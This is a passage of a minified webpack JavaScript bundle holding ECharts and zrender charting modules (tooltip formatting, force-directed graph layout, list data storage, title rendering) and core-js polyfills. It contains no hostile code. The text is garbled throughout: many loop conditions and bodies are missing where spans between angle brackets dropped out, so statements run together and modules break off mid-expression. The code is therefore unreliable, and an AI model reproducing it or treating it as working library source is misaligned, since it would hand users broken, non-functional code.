m=a?d?"\n":"
":"",_=m+h.join(m||", ");return{renderMode:i,content:_,style:f}}function m(e){return{renderMode:i,content:l(u(e)),style:f}}var v=this.getData(),y=v.mapDimension("defaultedTooltip",!0),_=y.length,b=this.getRawValue(e),x=r.isArray(b),w=v.getItemVisual(e,"color");r.isObject(w)&&w.colorStops&&(w=(w.colorStops[0]||{}).color),w=w||"transparent";var k=_>1||x&&!_?g(b):m(_?S(v,e,y[0]):x?b[0]:b),M=k.content,A=o.seriesIndex+"at"+p,C=c({color:w,type:"item",renderMode:i,markerId:A});f[A]=w,++p;var T=v.getName(e),I=this.name;h.isNameSpecified(this)||(I=""),I=I?l(I)+(t?": ":a):"";var D="string"===typeof C?C:C.content,L=t?D+I+M:I+D+(T?l(T)+": "+M:M);return{html:L,markers:f}},isAnimationEnabled:function(){if(o.node)return!1;var e=this.getShallow("animation");return e&&this.getData().count()>this.getShallow("animationThreshold")&&(e=!1),e},restoreData:function(){this.dataTask.dirty()},getColorFromPalette:function(e,t,n){var i=this.ecModel,r=f.getColorFromPalette.call(this,e,t,n);return r||(r=i.getColorFromPalette(e,t,n)),r},coordDimToDataDim:function(e){return this.getRawData().mapDimension(e,!0)},getProgressive:function(){return this.get("progressive")},getProgressiveThreshold:function(){return this.get("progressiveThreshold")},getAxisTooltipData:null,getTooltipPosition:null,pipeTask:null,preventIncremental:null,pipelineContext:null});function C(e){var t=e.name;h.isNameSpecified(e)||(e.name=T(e)||t)}function T(e){var t=e.getRawData(),n=t.mapDimension("seriesName",!0),i=[];return r.each(n,(function(e){var n=t.getDimensionInfo(e);n.displayName&&i.push(n.displayName)})),i.join(" ")}function I(e){return e.model.getRawData().count()}function D(e){var t=e.model;return t.setData(t.getRawData().cloneShallow()),L}function L(e,t){t.outputData&&e.end>t.outputData.count()&&t.model.getRawData().cloneShallow(t.outputData)}function E(e,t){r.each(e.CHANGABLE_METHODS,(function(n){e.wrapMethod(n,r.curry(O,t))}))}function O(e){var t=P(e);t&&t.setOutputEnd(this.count())}function P(e){var t=(e.ecModel||{}).scheduler,n=t&&t.getPipeline(e.uid);if(n){var i=n.currentTask;if(i){var r=i.agentStubMap;r&&(i=r.get(e.uid))}return i}}r.mixin(A,p),r.mixin(A,f);var R=A;e.exports=R},"4fac":function(e,t,n){var i=n("620b"),r=n("9c2c");function o(e,t,n){var o=t.points,a=t.smooth;if(o&&o.length>=2){if(a&&"spline"!==a){var s=r(o,a,n,t.smoothConstraint);e.moveTo(o[0][0],o[0][1]);for(var l=o.length,u=0;u<(n?l:l-1);u++){var c=s[2*u],h=s[2*u+1],d=o[(u+1)%l];e.bezierCurveTo(c[0],c[1],h[0],h[1],d[0],d[1])}}else{"spline"===a&&(o=i(o,n)),e.moveTo(o[0][0],o[0][1]);u=1;for(var f=o.length;u0?r(i(e),9007199254740991):0}},"50e5":function(e,t,n){var i=n("6d8b"),r=n("eda2"),o=["x","y","z","radius","angle","single"],a=["cartesian2d","polar","singleAxis"];function s(e){return i.indexOf(a,e)>=0}function l(e,t){e=e.slice();var n=i.map(e,r.capitalFirst);t=(t||[]).slice();var o=i.map(t,r.capitalFirst);return function(r,a){i.each(e,(function(e,i){for(var s={name:e,capital:n[i]},l=0;l=0}function o(e,r){var o=!1;return t((function(t){i.each(n(e,t)||[],(function(e){r.records[t.name][e]&&(o=!0)}))})),o}function a(e,r){r.nodes.push(e),t((function(t){i.each(n(e,t)||[],(function(e){r.records[t.name][e]=!0}))}))}}t.isCoordSupported=s,t.createNameEach=l,t.eachAxisDim=u,t.createLinkedNodesFinder=c},"511f":function(e,t,n){n("0b99"),n("658f"),e.exports=n("fcd4").f("iterator")},"512c":function(e,t,n){var i=n("ef08"),r=n("5524"),o=n("9c0c"),a=n("051b"),s=n("9c0e"),l="prototype",u=function(e,t,n){var c,h,d,f=e&u.F,p=e&u.G,g=e&u.S,m=e&u.P,v=e&u.B,y=e&u.W,_=p?r:r[t]||(r[t]={}),b=_[l],x=p?i:g?i[t]:(i[t]||{})[l];for(c in p&&(n=t),n)h=!f&&x&&void 0!==x[c],h&&s(_,c)||(d=h?x[c]:n[c],_[c]=p&&"function"!=typeof x[c]?n[c]:v&&h?o(d,i):y&&x[c]==d?function(e){var t=function(t,n,i){if(this instanceof e){switch(arguments.length){case 0:return new e;case 1:return new e(t);case 2:return new e(t,n)}return new e(t,n,i)}return e.apply(this,arguments)};return t[l]=e[l],t}(d):m&&"function"==typeof d?o(Function.call,d):d,m&&((_.virtual||(_.virtual={}))[c]=d,e&u.R&&b&&!b[c]&&a(b,c,d)))};u.F=1,u.G=2,u.S=4,u.P=8,u.B=16,u.W=32,u.U=64,u.R=128,e.exports=u},5135:function(e,t){var n={}.hasOwnProperty;e.exports=function(e,t){return n.call(e,t)}},"527a":function(e,t,n){var i=n("6d8b"),r=n("3842");function o(e,t){e.eachSeriesByType("themeRiver",(function(e){var t=e.getData(),n=e.coordinateSystem,i={},o=n.getRect();i.rect=o;var s=e.get("boundaryGap"),l=n.getAxis();if(i.boundaryGap=s,"horizontal"===l.orient){s[0]=r.parsePercent(s[0],o.height),s[1]=r.parsePercent(s[1],o.height);var u=o.height-s[0]-s[1];a(t,e,u)}else{s[0]=r.parsePercent(s[0],o.width),s[1]=r.parsePercent(s[1],o.width);var c=o.width-s[0]-s[1];a(t,e,c)}t.setLayout("layoutInfo",i)}))}function a(e,t,n){if(e.count())for(var r,o=t.coordinateSystem,a=t.getLayerSeries(),l=e.mapDimension("single"),u=e.mapDimension("value"),c=i.map(a,(function(t){return i.map(t.indices,(function(t){var n=o.dataToPoint(e.get(l,t));return n[1]=e.get(u,t),n}))})),h=s(c),d=h.y0,f=n/h.max,p=a.length,g=a[0].indices.length,m=0;mo&&(o=u),i.push(u)}for(var c=0;co&&(o=d)}return a.y0=r,a.max=o,a}e.exports=o},5319:function(e,t,n){"use strict";var i=n("d784"),r=n("825a"),o=n("7b0b"),a=n("50c4"),s=n("a691"),l=n("1d80"),u=n("8aa5"),c=n("14c3"),h=Math.max,d=Math.min,f=Math.floor,p=/\$([$&'`]|\d\d?|<[^>]*>)/g,g=/\$([$&'`]|\d\d?)/g,m=function(e){return void 0===e?e:String(e)};i("replace",2,(function(e,t,n,i){var v=i.REGEXP_REPLACE_SUBSTITUTES_UNDEFINED_CAPTURE,y=i.REPLACE_KEEPS_$0,_=v?"$":"$0";return[function(n,i){var r=l(this),o=void 0==n?void 0:n[e];return void 0!==o?o.call(n,r,i):t.call(String(r),n,i)},function(e,i){if(!v&&y||"string"===typeof i&&-1===i.indexOf(_)){var o=n(t,e,this,i);if(o.done)return o.value}var l=r(e),f=String(this),p="function"===typeof i;p||(i=String(i));var g=l.global;if(g){var x=l.unicode;l.lastIndex=0}var w=[];while(1){var k=c(l,f);if(null===k)break;if(w.push(k),!g)break;var S=String(k[0]);""===S&&(l.lastIndex=u(f,a(l.lastIndex),x))}for(var M="",A=0,C=0;C=A&&(M+=f.slice(A,I)+P,A=I+T.length)}return M+f.slice(A)}];function b(e,n,i,r,a,s){var l=i+e.length,u=r.length,c=g;return void 0!==a&&(a=o(a),c=p),t.call(s,c,(function(t,o){var s;switch(o.charAt(0)){case"$":return"$";case"&":return e;case"`":return n.slice(0,i);case"'":return n.slice(l);case"<":s=a[o.slice(1,-1)];break;default:var c=+o;if(0===c)return t;if(c>u){var h=f(c/10);return 0===h?t:h<=u?void 0===r[h-1]?o.charAt(1):r[h-1]+o.charAt(1):t}s=r[c-1]}return void 0===s?"":s}))}}))},"53f3":function(e,t){function n(e){var t=e.coordinateSystem;if("view"!==t.type)return 1;var n=e.option.nodeScaleRatio,i=t.scale,r=i&&i[0]||1,o=t.getZoom(),a=(o-1)*n+1;return a/r}function i(e){var t=e.getVisual("symbolSize");return t instanceof Array&&(t=(t[0]+t[1])/2),+t}t.getNodeGlobalScale=n,t.getSymbolSize=i},5450:function(e,t,n){n("7419"),n("29a9")},"54fb":function(e,t){function n(e){e.eachSeriesByType("map",(function(e){var t=e.get("color"),n=e.getModel("itemStyle"),i=n.get("areaColor"),r=n.get("color")||t[e.seriesIndex%t.length];e.getData().setVisual({areaColor:i,color:r})}))}e.exports=n},"551f":function(e,t,n){var i=n("282b"),r=i([["fill","color"],["stroke","borderColor"],["lineWidth","borderWidth"],["opacity"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["shadowColor"],["textPosition"],["textAlign"]]),o={getItemStyle:function(e,t){var n=r(this,e,t),i=this.getBorderLineDash();return i&&(n.lineDash=i),n},getBorderLineDash:function(){var e=this.get("borderType");return"solid"===e||null==e?null:"dashed"===e?[5,5]:[1,1]}};e.exports=o},5522:function(e,t,n){n("23e0"),n("1748"),n("6c12")},5524:function(e,t){var n=e.exports={version:"2.6.12"};"number"==typeof __e&&(__e=n)},5530:function(e,t,n){"use strict";n.d(t,"a",(function(){return o}));n("b64b"),n("a4d3"),n("4de4"),n("d3b7"),n("e439"),n("159b"),n("dbb4");var i=n("ade3");function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,i)}return n}function o(e){for(var t=1;tr[n+t]&&(t=a),o&=i.get("preventDefaultMouseMove",!0)})),{controlType:t,opt:{zoomOnMouseWheel:!0,moveOnMouseMove:!0,moveOnMouseWheel:!0,preventDefaultMouseMove:!!o}}}t.register=s,t.unregister=l,t.generateCoordId=u},"55ac":function(e,t,n){var i=n("6d8b");function r(e,t,n){if(e&&i.indexOf(t,e.type)>=0){var r=n.getData().tree.root,o=e.targetNode;if("string"===typeof o&&(o=r.getNodeById(o)),o&&r.contains(o))return{node:o};var a=e.targetNodeId;if(null!=a&&(o=r.getNodeById(a)))return{node:o}}}function o(e){var t=[];while(e)e=e.parentNode,e&&t.push(e);return t.reverse()}function a(e,t){var n=o(e);return i.indexOf(n,t)>=0}function s(e,t){var n=[];while(e){var i=e.dataIndex;n.push({name:e.name,dataIndex:i,value:t.getRawValue(i)}),e=e.parentNode}return n.reverse(),n}t.retrieveTargetInfo=r,t.getPathToRoot=o,t.aboveViewRoot=a,t.wrapTreePathInfo=s},"562e":function(e,t,n){var i=n("6d8b");function r(e){null!=e&&i.extend(this,e),this.otherDims={}}var o=r;e.exports=o},5692:function(e,t,n){var i=n("c430"),r=n("c6cd");(e.exports=function(e,t){return r[e]||(r[e]=void 0!==t?t:{})})("versions",[]).push({version:"3.6.5",mode:i?"pure":"global",copyright:"© 2020 Denis Pushkarev (zloirock.ru)"})},5693:function(e,t){function n(e,t){var n,i,r,o,a,s=t.x,l=t.y,u=t.width,c=t.height,h=t.r;u<0&&(s+=u,u=-u),c<0&&(l+=c,c=-c),"number"===typeof h?n=i=r=o=h:h instanceof Array?1===h.length?n=i=r=o=h[0]:2===h.length?(n=r=h[0],i=o=h[1]):3===h.length?(n=h[0],i=o=h[1],r=h[2]):(n=h[0],i=h[1],r=h[2],o=h[3]):n=i=r=o=0,n+i>u&&(a=n+i,n*=u/a,i*=u/a),r+o>u&&(a=r+o,r*=u/a,o*=u/a),i+r>c&&(a=i+r,i*=c/a,r*=c/a),n+o>c&&(a=n+o,n*=c/a,o*=c/a),e.moveTo(s+n,l),e.lineTo(s+u-i,l),0!==i&&e.arc(s+u-i,l+i,i,-Math.PI/2,0),e.lineTo(s+u,l+c-r),0!==r&&e.arc(s+u-r,l+c-r,r,0,Math.PI/2),e.lineTo(s+o,l+c),0!==o&&e.arc(s+o,l+c-o,o,Math.PI/2,Math.PI),e.lineTo(s,l+n),0!==n&&e.arc(s+n,l+n,n,Math.PI,1.5*Math.PI)}t.buildPath=n},"56ef":function(e,t,n){var i=n("d066"),r=n("241c"),o=n("7418"),a=n("825a");e.exports=i("Reflect","ownKeys")||function(e){var t=r.f(a(e)),n=o.f;return n?t.concat(n(e)):t}},5866:function(e,t,n){var i=n("ef2b"),r=i.forceLayout,o=n("1c5f"),a=o.simpleLayout,s=n("94e4"),l=s.circularLayout,u=n("3842"),c=u.linearMap,h=n("401b"),d=n("6d8b"),f=n("0c37"),p=f.getCurvenessForEdge;function g(e){e.eachSeriesByType("graph",(function(e){var t=e.coordinateSystem;if(!t||"view"===t.type)if("force"===e.get("layout")){var n=e.preservedPoints||{},i=e.getGraph(),o=i.data,s=i.edgeData,u=e.getModel("force"),f=u.get("initLayout");e.preservedPoints?o.each((function(e){var t=o.getId(e);o.setItemLayout(e,n[t]||[NaN,NaN])})):f&&"none"!==f?"circular"===f&&l(e,"value"):a(e);var g=o.getDataExtent("value"),m=s.getDataExtent("value"),v=u.get("repulsion"),y=u.get("edgeLength");d.isArray(v)||(v=[v,v]),d.isArray(y)||(y=[y,y]),y=[y[1],y[0]];var _=o.mapArray("value",(function(e,t){var n=o.getItemLayout(t),i=c(e,g,v);return isNaN(i)&&(i=(v[0]+v[1])/2),{w:i,rep:i,fixed:o.getItemModel(t).get("fixed"),p:!n||isNaN(n[0])||isNaN(n[1])?null:n}})),b=s.mapArray("value",(function(t,n){var r=i.getEdgeByIndex(n),o=c(t,m,y);isNaN(o)&&(o=(y[0]+y[1])/2);var a=r.getModel(),s=d.retrieve3(a.get("lineStyle.curveness"),-p(r,e,n,!0),0);return{n1:_[r.node1.dataIndex],n2:_[r.node2.dataIndex],d:o,curveness:s,ignoreForceLayout:a.get("ignoreForceLayout")}})),x=(t=e.coordinateSystem,t.getBoundingRect()),w=r(_,b,{rect:x,gravity:u.get("gravity"),friction:u.get("friction")}),k=w.step;w.step=function(e){for(var t=0,r=_.length;te?u():!0!==t&&(r=setTimeout(i?c:u,void 0===i?e-s:e))}return"boolean"!==typeof t&&(i=n,n=t,t=void 0),a}},"5a34":function(e,t,n){var i=n("44e7");e.exports=function(e){if(i(e))throw TypeError("The method doesn't accept regular expressions");return e}},"5a43":function(e,t){function n(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,i=new Array(t);n=0;a--)null==n[a]&&(delete r[t[a]],t.pop())}function p(e,t){var n=e.visual,r=[];i.isObject(n)?s(n,(function(e){r.push(e)})):null!=n&&r.push(n);var o={color:1,symbol:1};t||1!==r.length||o.hasOwnProperty(e.type)||(r[1]=r[0]),w(e,r)}function g(e){return{applyVisual:function(t,n,i){t=this.mapValueToVisual(t),i("color",e(n("color"),t))},_doMap:b([0,1])}}function m(e){var t=this.option.visual;return t[Math.round(a(e,[0,1],[0,t.length-1],!0))]||{}}function v(e){return function(t,n,i){i(e,this.mapValueToVisual(t))}}function y(e){var t=this.option.visual;return t[this.option.loop&&e!==u?e%t.length:e]}function _(){return this.option.visual[0]}function b(e){return{linear:function(t){return a(t,e,this.option.visual,!0)},category:y,piecewise:function(t,n){var i=x.call(this,n);return null==i&&(i=a(t,e,this.option.visual,!0)),i},fixed:_}}function x(e){var t=this.option,n=t.pieceList;if(t.hasSpecialVisual){var i=c.findPieceIndex(e,n),r=n[i];if(r&&r.visual)return r.visual[this.type]}}function w(e,t){return e.visual=t,"color"===e.type&&(e.parsedVisual=i.map(t,(function(e){return r.parse(e)}))),t}var k={linear:function(e){return a(e,this.option.dataExtent,[0,1],!0)},piecewise:function(e){var t=this.option.pieceList,n=c.findPieceIndex(e,t,!0);if(null!=n)return a(n,[0,t.length-1],[0,1],!0)},category:function(e){var t=this.option.categories?this.option.categoryMap[e]:e;return null==t?u:t},fixed:i.noop};function S(e,t,n){return e?t<=n:t=0;if(r){var o="touchend"!==i?t.targetTouches[0]:t.changedTouches[0];o&&h(e,o,t,n)}else h(e,t,t,n),t.zrDelta=t.wheelDelta?t.wheelDelta/120:-(t.detail||0)/3;var a=t.button;return null==t.which&&void 0!==a&&u.test(t.type)&&(t.which=1&a?1:2&a?3:4&a?2:0),t}function g(e,t,n,i){l?e.addEventListener(t,n,i):e.attachEvent("on"+t,n)}function m(e,t,n,i){l?e.removeEventListener(t,n,i):e.detachEvent("on"+t,n)}var v=l?function(e){e.preventDefault(),e.stopPropagation(),e.cancelBubble=!0}:function(e){e.returnValue=!1,e.cancelBubble=!0};function y(e){return 2===e.which||3===e.which}function _(e){return e.which>1}t.clientToLocal=h,t.getNativeEvent=f,t.normalizeEvent=p,t.addEventListener=g,t.removeEventListener=m,t.stop=v,t.isMiddleOrRightButtonOnMouseUpDown=y,t.notLeftMouse=_},"60d7":function(e,t,n){var i=n("2306"),r=n("e887"),o=.3,a=r.extend({type:"parallel",init:function(){this._dataGroup=new i.Group,this.group.add(this._dataGroup),this._data,this._initialized},render:function(e,t,n,r){var o=this._dataGroup,a=e.getData(),d=this._data,f=e.coordinateSystem,p=f.dimensions,g=c(e);function m(e){var t=u(a,o,e,p,f);h(t,a,e,g)}function v(t,n){var o=d.getItemGraphicEl(n),s=l(a,t,p,f);a.setItemGraphicEl(t,o);var u=r&&!1===r.animation?null:e;i.updateProps(o,{shape:{points:s}},u,t),h(o,a,t,g)}function y(e){var t=d.getItemGraphicEl(e);o.remove(t)}if(a.diff(d).add(m).update(v).remove(y).execute(),!this._initialized){this._initialized=!0;var _=s(f,e,(function(){setTimeout((function(){o.removeClipPath()}))}));o.setClipPath(_)}this._data=a},incrementalPrepareRender:function(e,t,n){this._initialized=!0,this._data=null,this._dataGroup.removeAll()},incrementalRender:function(e,t,n){for(var i=t.getData(),r=t.coordinateSystem,o=r.dimensions,a=c(t),s=e.start;sc){var f,p=u(arguments[c++]),g=h?o(p).concat(h(p)):o(p),m=g.length,v=0;while(m>v)f=g[v++],i&&!d.call(p,f)||(n[f]=p[f])}return n}:c},"60e3":function(e,t,n){var i=n("6d8b"),r={get:function(e,t,n){var r=i.clone((o[e]||{})[t]);return n&&i.isArray(r)?r[r.length-1]:r}},o={color:{active:["#006edd","#e0ffff"],inactive:["rgba(0,0,0,0)"]},colorHue:{active:[0,360],inactive:[0,0]},colorSaturation:{active:[.3,1],inactive:[0,0]},colorLightness:{active:[.9,.5],inactive:[0,0]},colorAlpha:{active:[.3,1],inactive:[0,0]},opacity:{active:[.3,1],inactive:[0,0]},symbol:{active:["circle","roundRect","diamond"],inactive:["none"]},symbolSize:{active:[10,50],inactive:[0,0]}},a=r;e.exports=a},6179:function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=n("4319"),a=n("80f0"),s=n("ec6f"),l=n("2b17"),u=l.defaultDimValueGetters,c=l.DefaultDataProvider,h=n("2f45"),d=h.summarizeDimensions,f=n("562e"),p=r.isObject,g="undefined",m=-1,v="e\0\0",y={float:typeof Float64Array===g?Array:Float64Array,int:typeof Int32Array===g?Array:Int32Array,ordinal:Array,number:Array,time:Array},_=typeof Uint32Array===g?Array:Uint32Array,b=typeof Int32Array===g?Array:Int32Array,x=typeof Uint16Array===g?Array:Uint16Array;function w(e){return e._rawCount>65535?_:x}function k(e){var t=e.constructor;return t===Array?e.slice():new t(e)}var S=["hasItemOption","_nameList","_idList","_invertedIndicesMap","_rawData","_chunkSize","_chunkCount","_dimValueGetter","_count","_rawCount","_nameDimIdx","_idDimIdx"],M=["_extent","_approximateExtent","_rawExtent"];function A(e,t){r.each(S.concat(t.__wrappedMethods||[]),(function(n){t.hasOwnProperty(n)&&(e[n]=t[n])})),e.__wrappedMethods=t.__wrappedMethods,r.each(M,(function(n){e[n]=r.clone(t[n])})),e._calculationInfo=r.extend(t._calculationInfo)}var C=function(e,t){e=e||["x","y"];for(var n={},i=[],o={},a=0;a=0?this._indices[e]:-1}function P(e,t){var n=e._idList[t];return null==n&&(n=L(e,e._idDimIdx,t)),null==n&&(n=v+t),n}function R(e){return r.isArray(e)||(e=[e]),e}function N(e,t){var n=e.dimensions,i=new C(r.map(n,e.getDimensionInfo,e),e.hostModel);A(i,e);for(var o=i._storage={},a=e._storage,s=0;s=0?(o[l]=z(a[l]),i._rawExtent[l]=F(),i._extent[l]=null):o[l]=a[l])}return i}function z(e){for(var t=new Array(e.length),n=0;n_[1]&&(_[1]=y)}t&&(this._nameList[f]=t[p])}this._rawCount=this._count=l,this._extent={},D(this)},T._initDataFromProvider=function(e,t){if(!(e>=t)){for(var n,i=this._chunkSize,r=this._rawData,o=this._storage,a=this.dimensions,s=a.length,l=this._dimensionInfos,u=this._nameList,c=this._idList,h=this._rawExtent,d=this._nameRepeatCount={},f=this._chunkCount,p=0;pS[1]&&(S[1]=k)}if(!r.pure){var M=u[y];if(v&&null==M)if(null!=v.name)u[y]=M=v.name;else if(null!=n){var A=a[n],C=o[A][_];if(C){M=C[b];var T=l[A].ordinalMeta;T&&T.categories.length&&(M=T.categories[M])}}var L=null==v?null:v.id;null==L&&null!=M&&(d[M]=d[M]||0,L=M,d[M]>0&&(L+="__ec__"+d[M]),d[M]++),null!=L&&(c[y]=L)}}!r.persistent&&r.clean&&r.clean(),this._rawCount=this._count=t,this._extent={},D(this)}},T.count=function(){return this._count},T.getIndices=function(){var e=this._indices;if(e){var t=e.constructor,n=this._count;if(t===Array){r=new t(n);for(var i=0;i=0&&t=0&&ts&&(s=u)}return i=[a,s],this._extent[e]=i,i},T.getApproximateExtent=function(e){return e=this.getDimension(e),this._approximateExtent[e]||this.getDataExtent(e)},T.setApproximateExtent=function(e,t){t=this.getDimension(t),this._approximateExtent[t]=e.slice()},T.getCalculationInfo=function(e){return this._calculationInfo[e]},T.setCalculationInfo=function(e,t){p(e)?r.extend(this._calculationInfo,e):this._calculationInfo[e]=t},T.getSum=function(e){var t=this._storage[e],n=0;if(t)for(var i=0,r=this.count();i=this._rawCount||e<0)return-1;if(!this._indices)return e;var t=this._indices,n=t[e];if(null!=n&&ne))return o;r=o-1}}return-1},T.indicesOfNearest=function(e,t,n){var i=this._storage,r=i[e],o=[];if(!r)return o;null==n&&(n=1/0);for(var a=1/0,s=-1,l=0,u=0,c=this.count();u=0&&s<0)&&(a=d,s=h,l=0),h===s&&(o[l++]=u))}return o.length=l,o},T.getRawIndex=E,T.getRawDataItem=function(e){if(this._rawData.persistent)return this._rawData.getItem(this.getRawIndex(e));for(var t=[],n=0;n=u&&y<=c||isNaN(y))&&(a[s++]=d),d++}h=!0}else if(2===i){f=this._storage[l];var _=this._storage[t[1]],b=e[t[1]][0],x=e[t[1]][1];for(p=0;p=u&&y<=c||isNaN(y))&&(S>=b&&S<=x||isNaN(S))&&(a[s++]=d),d++}}h=!0}}if(!h)if(1===i)for(v=0;v=u&&y<=c||isNaN(y))&&(a[s++]=M)}else for(v=0;ve[C][1])&&(A=!1)}A&&(a[s++]=this.getRawIndex(v))}return sw[1]&&(w[1]=x)}}}return o},T.downSample=function(e,t,n,i){for(var r=N(this,[e]),o=r._storage,a=[],s=Math.floor(1/t),l=o[e],u=this.count(),c=this._chunkSize,h=r._rawExtent[e],d=new(w(this))(u),f=0,p=0;pu-p&&(s=u-p,a.length=s);for(var g=0;gh[1]&&(h[1]=_),d[f++]=b}return r._count=f,r._indices=d,r.getRawIndex=O,r},T.getItemModel=function(e){var t=this.hostModel;return new o(this.getRawDataItem(e),t,t&&t.ecModel)},T.diff=function(e){var t=this;return new a(e?e.getIndices():[],this.getIndices(),(function(t){return P(e,t)}),(function(e){return P(t,e)}))},T.getVisual=function(e){var t=this._visual;return t&&t[e]},T.setVisual=function(e,t){if(p(e))for(var n in e)e.hasOwnProperty(n)&&this.setVisual(n,e[n]);else this._visual=this._visual||{},this._visual[e]=t},T.setLayout=function(e,t){if(p(e))for(var n in e)e.hasOwnProperty(n)&&this.setLayout(n,e[n]);else this._layout[e]=t},T.getLayout=function(e){return this._layout[e]},T.getItemLayout=function(e){return this._itemLayouts[e]},T.setItemLayout=function(e,t,n){this._itemLayouts[e]=n?r.extend(this._itemLayouts[e]||{},t):t},T.clearItemLayouts=function(){this._itemLayouts.length=0},T.getItemVisual=function(e,t,n){var i=this._itemVisuals[e],r=i&&i[t];return null!=r||n?r:this.getVisual(t)},T.setItemVisual=function(e,t,n){var i=this._itemVisuals[e]||{},r=this.hasItemVisual;if(this._itemVisuals[e]=i,p(t))for(var o in t)t.hasOwnProperty(o)&&(i[o]=t[o],r[o]=!0);else i[t]=n,r[t]=!0},T.clearAllVisual=function(){this._visual={},this._itemVisuals=[],this.hasItemVisual={}};var V=function(e){e.seriesIndex=this.seriesIndex,e.dataIndex=this.dataIndex,e.dataType=this.dataType};T.setItemGraphicEl=function(e,t){var n=this.hostModel;t&&(t.dataIndex=e,t.dataType=this.dataType,t.seriesIndex=n&&n.seriesIndex,"group"===t.type&&t.traverse(V,t)),this._graphicEls[e]=t},T.getItemGraphicEl=function(e){return this._graphicEls[e]},T.eachItemGraphicEl=function(e,t){r.each(this._graphicEls,(function(n,i){n&&e&&e.call(t,n,i)}))},T.cloneShallow=function(e){if(!e){var t=r.map(this.dimensions,this.getDimensionInfo,this);e=new C(t,this.hostModel)}if(e._storage=this._storage,A(e,this),this._indices){var n=this._indices.constructor;e._indices=new n(this._indices)}else e._indices=null;return e.getRawIndex=e._indices?O:E,e},T.wrapMethod=function(e,t){var n=this[e];"function"===typeof n&&(this.__wrappedMethods=this.__wrappedMethods||[],this.__wrappedMethods.push(e),this[e]=function(){var e=n.apply(this,arguments);return t.apply(this,[e].concat(r.slice(arguments)))})},T.TRANSFERABLE_METHODS=["cloneShallow","downSample","map"],T.CHANGABLE_METHODS=["filterSelf","selectRange"];var B=C;e.exports=B},"620b":function(e,t,n){var i=n("401b"),r=i.distance;function o(e,t,n,i,r,o,a){var s=.5*(n-e),l=.5*(i-t);return(2*(t-n)+s+l)*a+(-3*(t-n)-2*s-l)*o+s*r+t}function a(e,t){for(var n=e.length,i=[],a=0,s=1;sn-2?n-1:f+1],h=e[f>n-3?n-1:f+2]);var m=p*p,v=p*m;i.push([o(u[0],g[0],c[0],h[0],p,m,v),o(u[1],g[1],c[1],h[1],p,m,v)])}return i}e.exports=a},"625e":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=".",a="___EC__COMPONENT__CONTAINER___";function s(e){var t={main:"",sub:""};return e&&(e=e.split(o),t.main=e[0]||"",t.sub=e[1]||""),t}function l(e){r.assert(/^[a-zA-Z0-9_]+([.][a-zA-Z0-9_]+)?$/.test(e),'componentType "'+e+'" illegal')}function u(e,t){e.$constructor=e,e.extend=function(e){var t=this,n=function(){e.$constructor?e.$constructor.apply(this,arguments):t.apply(this,arguments)};return r.extend(n.prototype,e),n.extend=this.extend,n.superCall=d,n.superApply=f,r.inherits(n,this),n.superClass=t,n}}var c=0;function h(e){var t=["__\0is_clz",c++,Math.random().toFixed(3)].join("_");e.prototype[t]=!0,e.isInstance=function(e){return!(!e||!e[t])}}function d(e,t){var n=r.slice(arguments,2);return this.superClass.prototype[t].apply(e,n)}function f(e,t,n){return this.superClass.prototype[t].apply(e,n)}function p(e,t){t=t||{};var n={};function i(e){var t=n[e.main];return t&&t[a]||(t=n[e.main]={},t[a]=!0),t}if(e.registerClass=function(e,t){if(t)if(l(t),t=s(t),t.sub){if(t.sub!==a){var r=i(t);r[t.sub]=e}}else n[t.main]=e;return e},e.getClass=function(e,t,i){var r=n[e];if(r&&r[a]&&(r=t?r[t]:null),i&&!r)throw new Error(t?"Component "+e+"."+(t||"")+" not exists. Load it first.":e+".type should be specified.");return r},e.getClassesByMainType=function(e){e=s(e);var t=[],i=n[e.main];return i&&i[a]?r.each(i,(function(e,n){n!==a&&t.push(e)})):t.push(i),t},e.hasClass=function(e){return e=s(e),!!n[e.main]},e.getAllClassMainTypes=function(){var e=[];return r.each(n,(function(t,n){e.push(n)})),e},e.hasSubTypes=function(e){e=s(e);var t=n[e.main];return t&&t[a]},e.parseClassType=s,t.registerWhenExtend){var o=e.extend;o&&(e.extend=function(t){var n=o.call(this,t);return e.registerClass(n,t.type)})}return e}function g(e,t){}t.parseClassType=s,t.enableClassExtend=u,t.enableClassCheck=h,t.enableClassManagement=p,t.setReadOnly=g},"627c":function(e,t,n){var i=n("6d8b"),r=n("3eba"),o=n("2306"),a=n("f934"),s=a.getLayoutRect,l=n("eda2"),u=l.windowOpen;r.extendComponentModel({type:"title",layoutMode:{type:"box",ignoreSize:!0},defaultOption:{zlevel:0,z:6,show:!0,text:"",target:"blank",subtext:"",subtarget:"blank",left:0,top:0,backgroundColor:"rgba(0,0,0,0)",borderColor:"#ccc",borderWidth:0,padding:5,itemGap:10,textStyle:{fontSize:18,fontWeight:"bolder",color:"#333"},subtextStyle:{color:"#aaa"}}}),r.extendComponentView({type:"title",render:function(e,t,n){if(this.group.removeAll(),e.get("show")){var r=this.group,a=e.getModel("textStyle"),l=e.getModel("subtextStyle"),c=e.get("textAlign"),h=i.retrieve2(e.get("textBaseline"),e.get("textVerticalAlign")),d=new o.Text({style:o.setTextStyle({},a,{text:e.get("text"),textFill:a.getTextColor()},{disableBox:!0}),z2:10}),f=d.getBoundingRect(),p=e.get("subtext"),g=new o.Text({style:o.setTextStyle({},l,{text:p,textFill:l.getTextColor(),y:f.height+e.get("itemGap"),textVerticalAlign:"top"},{disableBox:!0}),z2:10}),m=e.get("link"),v=e.get("sublink"),y=e.get("triggerEvent",!0);d.silent=!m&&!y,g.silent=!v&&!y,m&&d.on("click",(function(){u(m,"_"+e.get("target"))})),v&&g.on("click",(function(){u(v,"_"+e.get("subtarget"))})),d.eventData=g.eventData=y?{componentType:"title",componentIndex:e.componentIndex}:null,r.add(d),p&&r.add(g);var _=r.getBoundingRect(),b=e.getBoxLayoutParams();b.width=_.width,b.height=_.height;var 